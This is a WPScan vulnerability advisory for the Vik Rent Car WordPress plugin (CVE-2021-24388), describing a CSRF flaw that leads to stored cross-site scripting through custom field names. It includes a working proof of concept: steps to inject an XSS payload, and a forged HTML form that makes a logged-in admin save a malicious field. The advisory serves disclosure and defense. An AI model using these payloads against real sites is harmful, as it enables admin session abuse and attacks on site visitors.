WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Vik Rent Car < 1.1.7 - CSRF to Stored XSS

Description

In the plugin, there is a custom filed option by which we can manage all the fields that the users will have to fill in before saving the order. However, the field name is not sanitised or escaped before being output back in the page, leading to a stored Cross-Site Scripting issue. There is also no CSRF check done before saving the setting, allowing attackers to make a logged in admin set arbitrary Custom Fields, including one with XSS payload in it.

Note: The XSS has been fixed in 1.1.6, and the CSRF in 1.1.7

Proof of Concept

Steps To produce the bug:

1. Go to the custom fields option in the plugin (/wp-admin/admin.php?option=com_vikrentcar&task=customf)
2. Edit the field and add an XSS payload in the Field Name, ie <img src=x onerror=alert(1337)>
3. Now save that and whenever anyone visit that XSS will trigger

via CSRF

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php" method="POST">
      <input type="hidden" name="name" value="ORDER_TERMSCONDITIONS<img src onerror=alert(/XSS/)>" />
      <input type="hidden" name="type" value="checkbox" />
      <input type="hidden" name="choose[]" value="" />
      <input type="hidden" name="required" value="1" />
      <input type="hidden" name="flag" value="" />
      <input type="hidden" name="poplink" value="" />
      <input type="hidden" name="task" value="updatecustomf" />
      <input type="hidden" name="option" value="com_vikrentcar" />
      <input type="hidden" name="where" value="13" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 

Affects Plugins

vikrentcar
Fixed in version 1.1.7

References

CVE
CVE-2021-24388

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Satyender Yadav

Submitter

Satyender Yadav

Verified

Yes

WPVDB ID
e3f6576f-08cb-4278-8c79-3ef4d0b85cd9

Timeline

Publicly Published

2021-06-14 (about 1 years ago)

Added

2021-06-14 (about 1 years ago)

Last Updated

2021-06-25 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us